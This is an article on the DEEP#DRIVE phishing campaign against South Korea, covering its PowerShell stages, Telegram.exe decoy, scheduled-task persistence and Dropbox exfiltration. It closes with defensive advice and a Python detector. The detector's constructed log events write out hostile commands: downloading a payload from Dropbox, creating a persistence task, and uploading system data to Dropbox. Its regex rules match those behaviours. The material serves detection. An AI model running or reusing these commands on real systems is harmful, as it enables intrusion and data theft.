DEEP#DRIVE: Major Cyberattack Hits South Korea

DEEP#DRIVE: Massive Cyber Espionage Operation

A large-scale cyberattack, known as DEEP#DRIVE, has been launched against South Korean businesses, government agencies, and cryptocurrency users. This phishing attack has already affected thousands of individuals, with hackers using fake documents to trick victims into downloading harmful software. The attack was first detected in September 2024, and its primary goal appears to be stealing sensitive information from South Korean entities.

Cybersecurity researchers investigating this campaign discovered that hackers are sending phishing emails written in Korean, disguised as important documents such as work logs, insurance files, and cryptocurrency-related reports. These emails contain malicious attachments that, when opened, install malware on the victim’s device.

One example of this deception involved a file disguised as a Telegram.exe application. The accompanying document carried the Korean label 대차 및 파레트, which translates to “bogie and pallet.” It contained details such as product name, factory location, and total weight, suggesting that the hackers were targeting businesses in the logistics sector.

To make the attack more convincing, hackers used trusted file formats, such as .hwp (a common Korean document format), .xlsx (Excel spreadsheets), and .pptx (PowerPoint presentations). These files were often stored on popular platforms like Dropbox, which helped the hackers avoid detection by traditional security systems. Researchers have confirmed that phishing was the primary method of infection, as the filenames and document themes closely matched common phishing techniques.

How the DEEP#DRIVE Attack Works

The DEEP#DRIVE campaign follows a multi-stage process designed to infect victims’ systems and extract valuable data. The attack typically begins when a user opens a .lnk file, which appears to be a harmless document but is actually a shortcut that executes malicious PowerShell scripts. These scripts allow hackers to gain control over the system and deploy additional harmful software.

Once the attack begins, the PowerShell script performs several key actions:

  • Collecting system details, including the victim’s IP address, operating system version, installed antivirus software, and currently running processes.
  • Downloading additional malicious files, disguised as legitimate applications such as Telegram.exe.
  • Ensuring the malware remains active on the system by setting up scheduled tasks such as ChromeUpdateTaskMachine to run automatically.
  • Exfiltrating stolen data to the hackers’ Dropbox accounts.

One of the primary tools used in this campaign was a script called “system_first.ps1”, which gathered critical system information and sent it to the hackers. Another script, “temp.ps1”, was responsible for deploying the final malicious payload. While researchers were unable to capture the full details of this payload, they suspect it was a backdoor, allowing hackers to gain persistent access to infected devices.

To avoid detection, the hackers used advanced stealth techniques, including:

  • Using meaningless variable names to make scripts harder to analyze.
  • Adding unnecessary lines of code to create confusion.
  • Manipulating strings in a complex way to prevent easy identification by security tools.

Additionally, once the attack was completed, the hackers deleted their Dropbox links, making it difficult for investigators to trace their activity. This suggests that the attackers had planned the operation carefully and used a temporary attack infrastructure to evade tracking.

Suspected Hackers and Security Measures

The methods and techniques used in the DEEP#DRIVE attack closely resemble past cyber operations carried out by an Advanced Persistent Threat (APT) group known for targeting South Korea. Cybersecurity researchers believe that the same group is behind this attack due to their use of phishing, PowerShell scripts, and Dropbox for data exfiltration.

To protect against similar attacks, cybersecurity experts recommend several important measures. One of the most critical steps is educating users about phishing tactics. Many cyberattacks succeed because people unknowingly click on malicious links or download infected files. Organizations should train employees to identify suspicious emails, avoid clicking on unverified links, and be cautious when downloading attachments.

Another key defense strategy is monitoring malware staging directories. Many attacks involve storing temporary malicious files on a system before executing them. Security teams should regularly check these directories for unusual or unauthorized files that could indicate an ongoing attack. By identifying threats at an early stage, organizations can prevent malware from spreading further.

Lastly, experts emphasize the importance of using strong endpoint logging systems, such as PowerShell logging. Since PowerShell scripts are commonly used in cyberattacks, logging all PowerShell activity can help security teams detect suspicious commands or unauthorized access attempts. This allows organizations to respond quickly and block malicious activities before they cause significant damage.
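Turning the behaviours described in this article (host reconnaissance, a Dropbox-hosted stage disguised as Telegram.exe, the ChromeUpdateTaskMachine scheduled task, and Dropbox exfiltration) into detection logic for PowerShell script-block logs, as an added example that is not from the original article or the researchers’ report. The sample events, commands, URLs and paths are constructed, and the rule patterns are assumptions keyed to the task name, file names and Dropbox use the article mentions.

```python
import re
from typing import Dict, List

# Constructed sample script-block events (Event ID 4104 style), i.e. the text a
# defender sees in Microsoft-Windows-PowerShell/Operational once script block
# logging is on. Commands, URLs and paths below are made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Users\\demo\\Documents"},
    {"id": 2, "script": "(Invoke-WebRequest 'https://api.ipify.org').Content; "
                        "Get-CimInstance Win32_OperatingSystem; "
                        "Get-CimInstance -Namespace root/SecurityCenter2 AntiVirusProduct; "
                        "Get-Process | Select-Object Name"},
    {"id": 3, "script": "Invoke-WebRequest 'https://dl.dropboxusercontent.com/s/x/Telegram.exe' "
                        "-OutFile $env:TEMP\\Telegram.exe"},
    {"id": 4, "script": "schtasks /create /tn ChromeUpdateTaskMachine /sc minute /mo 5 "
                        "/tr 'powershell -File $env:TEMP\\temp.ps1'"},
    {"id": 5, "script": "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload "
                        "-Method Post -InFile $env:TEMP\\sysinfo.txt"},
]

# Each rule maps one behaviour from the DEEP#DRIVE description to a pattern
# (assumed indicators): host reconnaissance, Dropbox-hosted stage download, the
# file names the article names, scheduled-task persistence, Dropbox exfiltration.
RULES: Dict[str, str] = {
    "system_recon": r"Win32_OperatingSystem|AntiVirusProduct|Get-Process|ipify",
    "dropbox_download": r"dropboxusercontent\.com.*-OutFile",
    "known_stage_names": r"Telegram\.exe|system_first\.ps1|temp\.ps1",
    "scheduled_task_persistence": r"schtasks\s+/create|Register-ScheduledTask",
    "chromeupdate_task_name": r"ChromeUpdateTaskMachine",
    "dropbox_exfil": r"dropboxapi\.com/2/files/upload",
}

def scan_event(script: str) -> List[str]:
    """Names of every rule whose pattern occurs in one logged script block."""
    return [name for name, pat in RULES.items() if re.search(pat, script, re.IGNORECASE)]

def scan_events(events) -> Dict[int, List[str]]:
    """Scan a batch of events; only those with at least one rule hit are returned."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        matched = scan_event(ev["script"])
        if matched:
            hits[ev["id"]] = matched
    return hits

if __name__ == "__main__":
    for event_id, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Events that trigger several rules in sequence from one host (recon, then a Dropbox download, then the task creation) are the chain the article describes, and are worth prioritising over any single hit.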

The DEEP#DRIVE cyberattack highlights the growing risks posed by phishing campaigns and the need for strong cybersecurity measures. With thousands of people already affected, this is one of the most significant cyber threats targeting South Korea in 2024.
